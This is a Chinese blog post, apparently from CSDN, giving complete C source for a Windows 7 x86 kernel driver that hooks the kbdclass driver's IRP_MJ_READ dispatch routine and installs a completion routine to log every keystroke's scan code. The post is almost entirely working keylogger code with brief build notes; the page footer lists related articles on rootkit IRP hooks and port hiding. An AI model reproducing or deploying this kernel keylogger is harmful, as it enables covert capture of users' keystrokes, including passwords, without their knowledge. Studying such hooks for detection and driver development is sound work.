通过IRPhook实现键盘记录

最新推荐文章于 2023-06-18 11:30:16 发布
原创 最新推荐文章于 2023-06-18 11:30:16 发布 · 2.1k 阅读 · 2 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#hook #irp #win7 #x86
本文详细介绍了在Windows 7 x86系统中如何通过myhead.h头文件实现驱动程序的加载过程,包括使用ObReferenceObjectByName函数引用对象,配置中断处理函数,以及驱动卸载时的清理操作。重点阐述了如何设置驱动的中断处理函数以响应系统中断,并通过DisPatchRead函数处理读取请求,同时展示了如何通过Hook函数动态改变中断处理行为。

测试机器:win7x86

myhead.h:

#include <ntddk.h>


NTKERNELAPI NTSTATUS ObReferenceObjectByName
(
IN PUNICODE_STRING ObjectName,
IN ULONG Attributes,
IN PACCESS_STATE PassedAccessState OPTIONAL,
IN ACCESS_MASK DesiredAccess OPTIONAL,
IN POBJECT_TYPE ObjectType,
IN KPROCESSOR_MODE AccessMode,
IN OUT PVOID ParseContext OPTIONAL,
OUT PVOID *Object
);


typedef NTSTATUS(__stdcall *PDRVDISPATCHFUNC)(PDEVICE_OBJECT pDevObj, PIRP pIrp);



NTSTATUS DisPatchRead(PDEVICE_OBJECT pDevObj, PIRP pIrp);
NTSTATUS Hook(BOOLEAN IsEnble);
void Unload(PDRIVER_OBJECT pDriverObj);
NTSTATUS
MyCompletionRoutine(
__in PDEVICE_OBJECT  DeviceObject,
__in PIRP  Irp,
__in PVOID  Context
);


test.c 

#include "myhead.h"
#include <ntddkbd.h>

extern POBJECT_TYPE *IoDriverObjectType;
PDRVDISPATCHFUNC OrlDispatchRead = NULL;
ULONG numPendingIrps = 0;

NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObj, PUNICODE_STRING pRegisterStr)
{
	UNREFERENCED_PARAMETER(pRegisterStr);
	NTSTATUS status = STATUS_SUCCESS;
	pDriverObj->DriverUnload = Unload;

	DbgPrint("DriverEntry\n");
	Hook(TRUE); 
	return status;
}

void Unload(PDRIVER_OBJECT pDriverObj)
{
	LARGE_INTEGER liDelayTime;
	Hook(FALSE);
	liDelayTime.QuadPart = -1000000;
	while (numPendingIrps > 0)
	{
		KeDelayExecutionThread(KernelMode, FALSE, &liDelayTime);
	}
	DbgPrint("Unload\n");
}

NTSTATUS Hook(BOOLEAN IsEnble)
{
	NTSTATUS status = STATUS_UNSUCCESSFUL;
	UNICODE_STRING usKeyDrvName;
	PDRIVER_OBJECT pKeyDrvObj = NULL;
	RtlInitUnicodeString(&usKeyDrvName, L"\\Driver\\kbdclass");
	status = ObReferenceObjectByName(&usKeyDrvName, OBJ_CASE_INSENSITIVE, NULL, 0, *IoDriverObjectType, KernelMode, NULL, (PVOID*)&pKeyDrvObj);
	if (!NT_SUCCESS(status))
	{
		DbgPrint("ObReferenceObjectByName error status:%p\n",status);
		return status;
	}
	ObReferenceObject(pKeyDrvObj);
	if (IsEnble)
	{
		OrlDispatchRead = pKeyDrvObj->MajorFunction[IRP_MJ_READ];
		pKeyDrvObj->MajorFunction[IRP_MJ_READ] = (PDRVDISPATCHFUNC)DisPatchRead;
	}
	else
	{
		pKeyDrvObj->MajorFunction[IRP_MJ_READ] = OrlDispatchRead;
	}

	return status;

}

NTSTATUS DisPatchRead(PDEVICE_OBJECT pDevObj, PIRP pIrp)
{

 	PIO_STACK_LOCATION pIrpSp = IoGetCurrentIrpStackLocation(pIrp);
 	DbgPrint("pIrpSp->Control:%x", pIrpSp->Control);
 	DbgPrint("abc:%x", SL_INVOKE_ON_SUCCESS | SL_INVOKE_ON_ERROR | SL_INVOKE_ON_CANCEL);
 	pIrpSp->Control = SL_INVOKE_ON_SUCCESS /*| SL_INVOKE_ON_ERROR | SL_INVOKE_ON_CANCEL*/;
	if (NT_SUCCESS(pIrp->IoStatus.Status))
	{
		DbgPrint("DisPatchRead KEY BOARD\n");

		DbgPrint("CompletionRoutine %p BOARD\n", (PVOID)pIrpSp->CompletionRoutine);
 		pIrpSp->Context = (PVOID)pIrpSp->CompletionRoutine;
 		pIrpSp->CompletionRoutine = MyCompletionRoutine;
	}
	if (pIrp->PendingReturned)
	{
		IoMarkIrpPending(pIrp);
	}
	numPendingIrps++;
	return OrlDispatchRead(pDevObj, pIrp);
}

NTSTATUS
MyCompletionRoutine(
__in PDEVICE_OBJECT  DeviceObject,
__in PIRP  Irp,
__in PVOID  Context
)
{
	DbgPrint("MyCompletionRoutine\n");
	PKEYBOARD_INPUT_DATA pKid;
	//PIO_STACK_LOCATION pIrpSp = IoGetCurrentIrpStackLocation(Irp);
	if (NT_SUCCESS(Irp->IoStatus.Status))
	{
		pKid = (PKEYBOARD_INPUT_DATA)Irp->AssociatedIrp.SystemBuffer;
		ULONG uCount = Irp->IoStatus.Information / sizeof(KEYBOARD_INPUT_DATA);
		for (ULONG i = 0; i < uCount;i++)
		{
			switch (pKid->Flags)
			{
			case KEY_MAKE:
				DbgPrint("\nFlag: KEY_MAKE\n");
				break;
			case KEY_BREAK:
				DbgPrint("\nFlag: KEY_BREAK\n");
				break;
			}
			DbgPrint("Key Code: %x\n", pKid->MakeCode);
		}
	}
	if (Irp->PendingReturned)
	{
		IoMarkIrpPending(Irp);
	}
	numPendingIrps--;
	if ((Irp->StackCount > (ULONG)1) && (Context != NULL))
	{
		return ((PIO_COMPLETION_ROUTINE)Context)(DeviceObject, Irp, NULL);
	}
	else
		return Irp->IoStatus.Status; 
}


其中
pIrpSp->Control = SL_INVOKE_ON_SUCCESS /*| SL_INVOKE_ON_ERROR | SL_INVOKE_ON_CANCEL*/;
这一句是必须要设置的,不然进不了自己的完成函数!
zfdyq0
关注
IRP HOOK 拦截ring0驱动层的IRP包.ring0 rootkit hook
01-24
IRP HOOK 拦截ring0驱动层的IRP包.ring0 rootkit hook
irp hook来隐藏端口(过vista)
05-16
irp hook来隐藏端口(过vista)
IRP Hook 键盘Logger
多媒体编程、网络编程、系统编程、网络安全编程、驱动编程
06-06 967
作 者: cogito 前天拜读combojiang 的rootkit hook 系列之[五] IRP Hook全家福(原帖:http://bbs.pediy.com/showthread.php?t=60022)之后,决定用文中的第三种方法实现一个KeyLogger。但是combojiang前辈并没有放上Demo,而且我在网上貌似也没找着完整的IRP Hook 键盘Logger实例,于是就
黑客爱用的 HOOK 技术大揭秘
A_991128a的博客
03-06 2408
病毒木马为何惨遭杀软拦截?商业软件为何频遭免费破解?系统漏洞为何能被补丁修复?这一切的背后到底是人性的扭曲,还是道德的沦丧,敬请收看今天的专题文章:《什么是 HOOK 技术?
[寒江独钓] IRP HOOK 键盘过滤之替换原键盘分发函数
weixin_30691871的博客
05-23 215
标题:[IRPHOOK]键盘过滤驱动学习 作者:0xFFFFCCCC 时间:2012-05-20 链接:http://hi.baidu.com/pushad/item/0a78c3ba0812e6afeaba9399 MajorFunction.h #ifndef _MAJORFUNCTION_HEADERS_ #define _MAJORFUNCTIO...
[IRP HOOK] 键盘过滤驱动学习
weixin_30537451的博客
05-23 270
标题:[IRPHOOK]键盘过滤驱动学习作者:0xFFFFCCCC时间:2012-05-20链接:http://hi.baidu.com/pushad/item/0d335810261c38483a176ee8 IRPHOOK这个篇幅整整学习了大半个多月,中间穿插了驾照考试第二科目,然后5.1回家十多天; 真的发现,学东西是速成的,断断续续拖拖拉拉的...
C#实现Hook功能
weixin_30567225的博客
07-19 1216
C#实现Hook功能 发布一个自己写的用于Hook.Net方法的类库,代码量不大,完全的C#代码实现,是一个比较有趣的功能,分享出来希望能和大家共同探讨安装:Install-PackageDotNetDetour源码:https://github.com/bigbaldy1128/DotNetDetour1.为何想做这个说到hook大家都应该不陌生,就是改变函数的执行流程,让...
hook 9大类
weixin_30950607的博客
03-27 322
HOOK技术主要分为两大类,一是内核层HOOK,一是用户层HOOK. 用户层HOOK也就是在ring3环境下hook kenerl32.dll、User3.dll、Gui32.dll、Advapi.dll等导出的函数。而内核层HOOK就是HOOK只有ring0级别环境下才能操作写入改变的内核对象,例如SSDT系统服务描述符表等。综合而言,主要有以下9种HOOK技术。(1)消息钩子消息钩子是最常见的...
IRP Hook
LYSM
03-02 1251
谈到irp拦截,基本上有三种方式 在起点拦截 在半路拦截 在终点拦截 下面我们会详细分析这几种方式哪些是有效的,哪种是无效的。 要理解这几种拦截,我们需要看看irp地传送过程。 (注意并不是每种IRP都经过这些步骤,由于设备类型和IRP种类的不同某些步骤会改变或根本不存在。) 一、IRP创建。 由于IRP开始于某个实体调用I/O管理器函数创建它,可以使用下面任何一种函数创建IRP: IoBuildAsynchronousFsdRequest 创建异步IRP(不需要等待其完成)。该函数和下一个函数仅适
IRP HOOK
zyorz的博客
05-04 1008
流程相比较R3 HOOK,R0的HOOK还是比较简单的(毕竟共享一块内存)直接IoGetDeviceObjectPointer根据名称获取驱动对象,然后更改分发函数数组元素即可HOOK指定IRP分发函数实现NTSTATUS InstallTCPDriverHook() { NTSTATUS ntStatus; UNICODE_STRING deviceTCPUnicode
x86 IRP HOOK
XboxMicro
02-26 1521
内核中一个很好的隐藏位置是每个设备驱动程序中包含的函数表。在安装驱动程序时,它初始化一个函数指针表,这些指针包含了它的各种类型I/O请求报文(I/O Request Packet IRP)处理函数的地址。IRP处理多种类型的请求,例如读、写和查询。由于驱动程序处于控制流中非常低的层次,因此它们是理想的钩子位置。 以下是微软公司DDK定义的标准IRP类型列表: // Define the
黑客爱用的HOOK技术大揭秘!
2201_75362610的博客
06-18 2284
病毒木马为何惨遭杀软拦截?商业软件为何频遭免费破解?系统漏洞为何能被补丁修复?《什么是HOOK技术?上面是开个玩笑,言归正传,今天来聊的话题就是安全领域一个非常重要的技术:HOOK技术。HOOK,英文意思是“钩子”在计算机编程中,HOOK是一种「劫持」程序原有执行流程,添加额外处理逻辑的一种技术。按照这个定义,其实我们Python中的装饰器和Java中的注解,这种面向切面编程的手法在某种程度上来说,也算是HOOK
IRPhook
weixin_34384557的博客
10-21 485
原理:直接IoGetDeviceObjectPointer根据名称获取驱动对象,然后更改分发函数数组元素即可HOOK指定IRP分发函数。//irphook.h /////////////////////////////////////////////////////////////////////////////////////// typedef BOOLEAN BOOL; typedef ...
黑客爱用的 HOOK 技术大揭秘!
ZL_1618的博客
03-11 950
上面几种 HOOK,修改的都是应用层的函数指针,而操作系统内核中还有一些非常重要的表格,它们的表项中记录了一些更加关键的函数,HOOK 这些表格中的函数是非常高危的操作,操作不当将导致操作系统崩溃。当发生异常时,操作系统就从最近的异常处理器进行寻求处理,如果能处理则罢了,不能处理就继续寻求更上一级的异常处理器,直到找到能处理的异常处理器。执行系统调用的时候,CPU 将从用户模式切换到内核模式,进入内核后,将会根据系统调用的 API 编号,去找到对应的系统服务函数,实现对应 API 的功能。
易语言API HOOK DeviceIOControl修改磁盘序列号
热门推荐
511遇见
05-26 1万+
hook的是DeviceIoControl,DeviceIoControl 将控制代码直接发送到指定的设备驱动程序,使相应的设备执行相应的操作,我们先看看这个API参数 .版本 2 .DLL命令 DeviceIoControl, 逻辑型, "kernel32", "DeviceIoControl" .参数 hDevice, 整数型 .参数 dwIoControlCode, 整数型 .参数 lpInBuffer, 整数型 .参数 nInBufferSize, 整数型
HOOK汇总
liujiayu2的专栏
07-10 1236
HOOK技术主要分为两大类,一是内核层HOOK,一是用户层HOOK. 用户层HOOK也就是在ring3环境下hook kenerl32.dll、 User3.dll、Gui32.dll、Advapi.dll等导出的函数。而内核层HOOK就是HOOK只有ring0级别环境下才能操作写入改变的内核 对象,例如SSDT系统服务描述符表等。综合而言,主要有以下9种HOOK技术。 (1)消息钩
IRP Hook检测
Returns' Station
05-11 1175
1 BOOL IRPHookChk(IN PUNICODE_STRING pObjName) 2 { 3 PDRIVER_OBJECT pdrv = 0; 4 NTSTATUS status = ObReferenceObjectByName(pObjName,OBJ_CASE_INSENSITIVE,0,0,IoDriverObjectType,KernelMo
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值